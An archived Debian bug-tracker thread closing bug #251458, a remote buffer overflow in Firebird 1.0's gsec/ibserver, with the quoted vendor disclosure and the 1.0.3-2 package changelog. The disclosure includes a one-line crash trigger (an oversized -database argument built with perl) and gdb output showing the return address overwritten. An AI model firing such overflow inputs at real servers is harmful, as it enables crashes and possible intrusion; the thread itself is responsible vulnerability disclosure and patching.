[Pkg-firebird-general] Bug#251458: marked as done (firebird: remote vulnerability)

Debian Bug Tracking System owner@bugs.debian.org
Mon, 06 Sep 2004 08:48:09 -0700

Your message dated Mon, 06 Sep 2004 11:32:38 -0400
with message-id <E1C4LTy-0001Ww-00@newraff.debian.org>
and subject line Bug#251458: fixed in firebird 1.0.3-2
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

Received: (at submit) by bugs.debian.org; 28 May 2004 16:09:31 +0000
>From raseesink@hotpop.com Fri May 28 09:09:31 2004
Return-path: <raseesink@hotpop.com>
Received: from babyruth.hotpop.com [] 
	by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
	id 1BTja8-0007EP-00; Fri, 28 May 2004 08:47:40 -0700
Received: from hotpop.com (kubrick.hotpop.com [])
	by babyruth.hotpop.com (Postfix) with SMTP id 1606D533122
	for <submit@bugs.debian.org>; Fri, 28 May 2004 15:14:41 +0000 (UTC)
Received: from seesink (seesink.kabel.utwente.nl [])
	by smtp-2.hotpop.com (Postfix) with SMTP
	id 697BA5221E7; Fri, 28 May 2004 15:14:36 +0000 (UTC)
Date: Fri, 28 May 2004 17:47:10 +0200
From: Remco Seesink <raseesink@hotpop.com>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Cc: noamr@beyondsecurity.com
Subject: firebird: remote vulnerability
Message-Id: <20040528174710.4582a5b7.raseesink@hotpop.com>
X-Mailer: Sylpheed version 0.9.10 (GTK+ 1.2.10; i386-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-HotPOP: -----------------------------------------------
                   Sent By HotPOP.com FREE Email
             Get your FREE POP email at www.HotPOP.com
Delivered-To: submit@bugs.debian.org
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2004_03_25 
	(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
	autolearn=no version=2.60-bugs.debian.org_2004_03_25

Package: firebird
Severity: grave
Tags: security, help


While preparing an nmu for this package I became aware of a security problem
from the previous maintainer. (I am considering adopting.)

If somebody knows this is fixed in firebird 1.0.3 that would be useful
information to me.


The problem is described in this e-mail:
Return-Path: <noamr@beyondsecurity.com>
X-Original-To: mdz@csh.rit.edu
Delivered-To: mdz@csh.rit.edu
Received: from mail.csh.rit.edu []
	by localhost with IMAP (fetchmail-6.2.5)
	for mdz@localhost (single-drop); Mon, 17 May 2004 09:06:55 -0700 (PDT)
Received: from klecker.debian.org (klecker.debian.org [])
	by blacksheep.csh.rit.edu (Postfix) with ESMTP id CF1519C50
	for <mdz@csh.rit.edu>; Mon, 17 May 2004 12:05:12 -0400 (EDT)
Received: from l192-117-97-135.broadband.actcom.net.il (vizzini.securiteam.com) [] 
	by klecker.debian.org with esmtp (Exim 3.35 1 (Debian))
	id 1BPkby-0007iv-00; Mon, 17 May 2004 18:05:07 +0200
Received: from [] ([])
	by vizzini.securiteam.com (8.12.11/8.12.11/Debian-3) with ESMTP id i4HG4YSD025759;
	Mon, 17 May 2004 19:04:35 +0300
From: Noam Rathaus <noamr@beyondsecurity.com>
Organization: Beyond Security
To: security@debian.org, team@security.debian.org
Subject: Security Vulnerability in Firefox Database
Date: Mon, 17 May 2004 19:04:54 +0300
User-Agent: KMail/1.6.2
Cc: SecurITeam News <news@securiteam.com>
MIME-Version: 1.0
Content-Disposition: inline
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable
Message-Id: <200405171904.54492.noamr@beyondsecurity.com>
Delivered-To: team@security.debian.org
X-Bogosity: No, tests=bogofilter, spamicity=0.000000, version=0.90.0



I know that version LI-V6.2.908 Firebird 1.0 (1.0.2-2.1) is very old, but=20
there appears to be an remotely exploitable overflow in this program.

By issuing:
gsec -database`perl -e'print ("A"x300)'`
=2Duser whenever -password whatever

On a remote server, you can see that:
gdb /usr/lib/firebird/bin/ibserver
GNU gdb 6.1-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public
License, and you are
welcome to change it and/or distribute copies of it
under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. =A0Type "show
warranty" for details.
This GDB was configured as "i386-linux"...(no debugging
symbols found)...Using host libthread_db library

(gdb) r
Starting program: /usr/lib/firebird/bin/ibserver
(no debugging symbols found)...(no debugging symbols
found)...(no debugging symbols found)...(no debugging
symbols found)...(no debugging symbols found)...[Thread
debugging using libthread_db enabled]
[New Thread 1075462272 (LWP 31389)]
(no debugging symbols found)...(no debugging symbols
found)...(no debugging symbols found)...(no debugging
symbols found)...(no debugging symbols found)...[New
Thread 1092549552 (LWP 31392)]
[New Thread 1100938160 (LWP 31393)]
[Thread 1100938160 (LWP 31393) exited]
[Thread 1092549552 (LWP 31392) exited]
[New Thread 1092549552 (LWP 31396)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1092549552 (LWP 31396)]
0x08132223 in ERR_post ()

(gdb) bt
#0 =A00x08132223 in ERR_post ()
#1 =A00x080942ac in THD_wlck_unlock ()
#2 =A00x41414141 in ?? ()
#3 =A00x41414141 in ?? ()
#4 =A00x41414141 in ?? ()
#5 =A00x41414141 in ?? ()
#6 =A00x41414141 in ?? ()
#7 =A00x41414141 in ?? ()
#8 =A00x00414141 in ?? ()
#9 =A00x0000012c in ?? ()

Debian is currently not maintaining this version of the product, but I thou=
it was worth mentioning.

Noam Rathaus
Beyond Security Ltd.

Join the SecuriTeam community on Orkut:

-- System Information:
Debian Release: testing/unstable
  APT prefers testing
  APT policy: (990, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.4.26-1-686
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8

Received: (at 251458-close) by bugs.debian.org; 6 Sep 2004 15:38:04 +0000
>From katie@ftp-master.debian.org Mon Sep 06 08:38:04 2004
Return-path: <katie@ftp-master.debian.org>
Received: from newraff.debian.org [] (mail)
	by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
	id 1C4LZD-00074D-00; Mon, 06 Sep 2004 08:38:03 -0700
Received: from katie by newraff.debian.org with local (Exim 3.35 1 (Debian))
	id 1C4LTy-0001Ww-00; Mon, 06 Sep 2004 11:32:38 -0400
From: Remco Seesink <raseesink@hotpop.com>
To: 251458-close@bugs.debian.org
X-Katie: $Revision: 1.51 $
Subject: Bug#251458: fixed in firebird 1.0.3-2
Message-Id: <E1C4LTy-0001Ww-00@newraff.debian.org>
Sender: Archive Administrator <katie@ftp-master.debian.org>
Date: Mon, 06 Sep 2004 11:32:38 -0400
Delivered-To: 251458-close@bugs.debian.org
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2004_03_25 
	(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
	autolearn=no version=2.60-bugs.debian.org_2004_03_25

Source: firebird
Source-Version: 1.0.3-2

We believe that the bug you reported is fixed in the latest version of
firebird, which is due to be installed in the Debian FTP archive:

  to pool/main/f/firebird/firebird-dev_1.0.3-2_i386.deb
  to pool/main/f/firebird/firebird_1.0.3-2.diff.gz
  to pool/main/f/firebird/firebird_1.0.3-2.dsc
  to pool/main/f/firebird/libfirebird-c32_1.0.3-2_i386.deb
  to pool/main/f/firebird/libfirebird-c64_1.0.3-2_i386.deb
  to pool/main/f/firebird/libfirebird-s32_1.0.3-2_i386.deb
  to pool/main/f/firebird/libfirebird-s64_1.0.3-2_i386.deb

A summary of the changes between this version and the previous one is

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 251458@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
Remco Seesink <raseesink@hotpop.com> (supplier of updated firebird package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)

Hash: SHA1

Format: 1.7
Date: Thu,  2 Sep 2004 21:26:01 +0200
Source: firebird
Binary: libfirebird-s64 libfirebird-c64 libfirebird-s32 firebird-dev libfirebird-c32
Architecture: source i386
Version: 1.0.3-2
Distribution: unstable
Urgency: high
Maintainer: Debian Firebird RDBMS Team <pkg-firebird-general@lists.alioth.debian.org>
Changed-By: Remco Seesink <raseesink@hotpop.com>
 firebird-dev - Development files for FireBird - RDBMS based on InterBase 6.0 cod
 libfirebird-c32 - Library files for FireBird Classic w/ 32bit I/O, InterBase compat
 libfirebird-c64 - Library files for FireBird Classic w/ 64bit I/O, InterBase compat
 libfirebird-s32 - Library files for FireBird Super w/ 32bit I/O, InterBase compat
 libfirebird-s64 - Library files for FireBird Super w/ 64bit I/O, InterBase compat
Closes: 251458
 firebird (1.0.3-2) unstable; urgency=high
   * This package will provide only firebird libraries from now on, which are
     useful for backward compatibility.  Closes: #251458
   * Documenting the situation in README.Debian
   * This version is needed to solve #268931 for sarge.
 65e13b920594de0198d4b198a54116fb 807 misc optional firebird_1.0.3-2.dsc
 ce6fc5a808bbf1de2bf6ab726e0f7c6c 1111742 misc optional firebird_1.0.3-2.diff.gz
 2d27f35ce052580b76f17dfd9dd04b99 85828 misc optional firebird-dev_1.0.3-2_i386.deb
 504efc41a71dcb326f14748e1bec2c26 683992 misc optional libfirebird-c32_1.0.3-2_i386.deb
 84577cdd620fb659fa7267d7a5256ac8 146078 misc optional libfirebird-s32_1.0.3-2_i386.deb
 6977a6078ca22c667f1233c0ef5fffcc 684032 misc optional libfirebird-c64_1.0.3-2_i386.deb
 806dfaef69e3e977e081ca510d3fb3c3 146266 misc optional libfirebird-s64_1.0.3-2_i386.deb

Version: GnuPG v1.2.5 (GNU/Linux)